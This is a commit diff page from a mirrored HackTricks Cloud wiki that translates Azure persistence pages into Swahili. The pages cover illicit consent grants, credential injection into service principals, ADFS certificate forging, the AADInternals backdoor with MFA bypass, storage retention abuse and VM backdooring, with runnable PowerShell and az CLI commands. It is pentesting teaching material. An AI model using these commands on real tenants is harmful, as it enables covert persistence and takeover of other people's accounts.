gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-13 21:36:23 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

Browse Source
This commit is contained in:
Translator
2024-12-31 19:03:28 +00:00
parent 7770a50092
commit 44da2ea78f
244 changed files with 7940 additions and 10781 deletions
Download Patch File Download Diff File Expand all files Collapse all files

34
src/pentesting-cloud/azure-security/az-persistence/README.md
View File

@@ -4,52 +4,43 @@
### Illicit Consent Grant
By default, any user can register an application in Azure AD. So you can register an application (only for the target tenant) that needs high impact permissions with admin consent (an approve it if you are the admin) - like sending mail on a user's behalf, role management etc.T his will allow us to **execute phishing attacks** that would be very **fruitful** in case of success.
Kwa default, mtumiaji yeyote anaweza kujiandikisha programu katika Azure AD. Hivyo unaweza kujiandikisha programu (tu kwa ajili ya mpangilio wa lengo) inayohitaji ruhusa zenye athari kubwa kwa idhini ya admin (na kuidhinisha ikiwa wewe ni admin) - kama kutuma barua pepe kwa niaba ya mtumiaji, usimamizi wa majukumu n.k. Hii itaturuhusu **kutekeleza mashambulizi ya phishing** ambayo yatakuwa na **faida** kubwa endapo yatakuwa na mafanikio.
Moreover, you could also accept that application with your user as a way to maintain access over it.
Zaidi ya hayo, unaweza pia kukubali programu hiyo kwa mtumiaji wako kama njia ya kudumisha ufikiaji juu yake.
### Applications and Service Principals
With privileges of Application Administrator, GA or a custom role with microsoft.directory/applications/credentials/update permissions, we can add credentials (secret or certificate) to an existing application.
Kwa ruhusa za Msimamizi wa Programu, GA au jukumu la kawaida lenye ruhusa microsoft.directory/applications/credentials/update, tunaweza kuongeza akreditivu (siri au cheti) kwa programu iliyopo.
It's possible to **target an application with high permissions** or **add a new application** with high permissions.
Inawezekana **kulenga programu yenye ruhusa kubwa** au **kuongeza programu mpya** yenye ruhusa kubwa.
An interesting role to add to the application would be **Privileged authentication administrator role** as it allows to **reset password** of Global Administrators.
This technique also allows to **bypass MFA**.
Jukumu la kuvutia kuongeza kwenye programu ingekuwa **jukumu la msimamizi wa uthibitishaji mwenye ruhusa** kwani inaruhusu **kurekebisha nenosiri** la Wasimamizi wa Kimataifa.
Teknolojia hii pia inaruhusu **kuzidi MFA**.
```powershell
$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
```
- For certificate based authentication
- Kwa uthibitisho wa msingi wa cheti
```powershell
Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
```
### Federation - Token Signing Certificate
With **DA privileges** on on-prem AD, it is possible to create and import **new Token signing** and **Token Decrypt certificates** that have a very long validity. This will allow us to **log-in as any user** whose ImuutableID we know.
**Run** the below command as **DA on the ADFS server(s)** to create new certs (default password 'AADInternals'), add them to ADFS, disable auto rollver and restart the service:
```powershell
New-AADIntADFSSelfSignedCertificates
```
Then, update the certificate information with Azure AD:
Kisha, sasisha taarifa za cheti na Azure AD:
```powershell
Update-AADIntADFSFederationSettings -Domain cyberranges.io
```
### Federation - Trusted Domain
With GA privileges on a tenant, it's possible to **add a new domain** (must be verified), configure its authentication type to Federated and configure the domain to **trust a specific certificate** (any.sts in the below command) and issuer:
Kwa kuwa na haki za GA kwenye mpangilio, inawezekana **kuongeza eneo jipya** (lazima liwe limehakikishwa), kuunda aina yake ya uthibitishaji kuwa ya Shirikisho na kuunda eneo hilo **kuamini cheti maalum** (any.sts katika amri iliyo hapa chini) na mtoaji:
```powershell
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
@@ -60,13 +51,8 @@ Get-MsolUser | select userPrincipalName,ImmutableID
# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true
```
## References
## Marejeo
- [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/)
{{#include ../../../banners/hacktricks-training.md}}

10
src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md
View File

@@ -4,7 +4,7 @@
## Queue
For more information check:
Kwa maelezo zaidi angalia:
{{#ref}}
../az-services/az-queue-enum.md
@@ -12,8 +12,7 @@ For more information check:
### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks.
Ruhusa hii inamruhusu mshambuliaji kuunda au kubadilisha foleni na mali zao ndani ya akaunti ya hifadhi. Inaweza kutumika kuunda foleni zisizoidhinishwa, kubadilisha metadata, au kubadilisha orodha za udhibiti wa ufikiaji (ACLs) ili kutoa au kupunguza ufikiaji. Uwezo huu unaweza kuharibu michakato, kuingiza data mbaya, kuhamasisha taarifa nyeti, au kubadilisha mipangilio ya foleni ili kuwezesha mashambulizi zaidi.
```bash
az storage queue create --name <new-queue-name> --account-name <storage-account>
@@ -21,7 +20,6 @@ az storage queue metadata update --name <queue-name> --metadata key1=value1 key2
az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name <storage-account>
```
## References
- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
@@ -29,7 +27,3 @@ az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-
- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
{{#include ../../../banners/hacktricks-training.md}}

34
src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md
View File

@@ -4,42 +4,34 @@
## Storage Privesc
For more information about storage check:
Kwa maelezo zaidi kuhusu hifadhi angalia:
{{#ref}}
../az-services/az-storage.md
{{#endref}}
### Common tricks
### Hila za kawaida
- Keep the access keys
- Generate SAS
- User delegated are 7 days max
- Hifadhi funguo za ufikiaji
- Tengeneza SAS
- Watumiaji waliotengwa ni siku 7 tu
### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write
These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information.
Ruhusa hizi zinamruhusu mtumiaji kubadilisha mali za huduma ya blob kwa kipengele cha uhifadhi wa kufutwa, ambacho kinawaruhusu au kuunda kipindi cha uhifadhi kwa kontena zilizofutwa. Ruhusa hizi zinaweza kutumika kudumisha uendelevu ili kutoa fursa kwa mshambuliaji kurejesha au kubadilisha kontena zilizofutwa ambazo zinapaswa kuwa zimeondolewa kabisa na kufikia taarifa nyeti.
```bash
az storage account blob-service-properties update \
--account-name <STORAGE_ACCOUNT_NAME> \
--enable-container-delete-retention true \
--container-delete-retention-days 100
--account-name <STORAGE_ACCOUNT_NAME> \
--enable-container-delete-retention true \
--container-delete-retention-days 100
```
### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information.
Hizi ruhusa zinaweza kumpelekea mshambuliaji kubadilisha sera za uhifadhi, kurejesha data iliyofutwa, na kupata taarifa nyeti.
```bash
az storage blob service-properties delete-policy update \
--account-name <STORAGE_ACCOUNT_NAME> \
--enable true \
--days-retained 100
--account-name <STORAGE_ACCOUNT_NAME> \
--enable true \
--days-retained 100
```
{{#include ../../../banners/hacktricks-training.md}}

16
src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md
View File

@@ -4,7 +4,7 @@
## VMs persistence
For more information about VMs check:
Kwa maelezo zaidi kuhusu VMs angalia:
{{#ref}}
../az-services/vms/
@@ -12,18 +12,14 @@ For more information about VMs check:
### Backdoor VM applications, VM Extensions & Images <a href="#backdoor-instances" id="backdoor-instances"></a>
An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed.
Mshambuliaji anapotambua programu, nyongeza au picha zinazotumiwa mara kwa mara katika akaunti ya Azure, anaweza kuingiza msimbo wake katika programu za VM na nyongeza ili kila wakati zinapowekwa, backdoor inatekelezwa.
### Backdoor Instances <a href="#backdoor-instances" id="backdoor-instances"></a>
An attacker could get access to the instances and backdoor them:
Mshambuliaji anaweza kupata ufikiaji wa instances na kuzi-backdoor:
- Using a traditional **rootkit** for example
- Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc))
- Backdooring the **User Data**
- Kutumia **rootkit** ya jadi kwa mfano
- Kuongeza **funguo mpya za SSH za umma** (angalia [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc))
- Ku-backdoor **User Data**
{{#include ../../../banners/hacktricks-training.md}}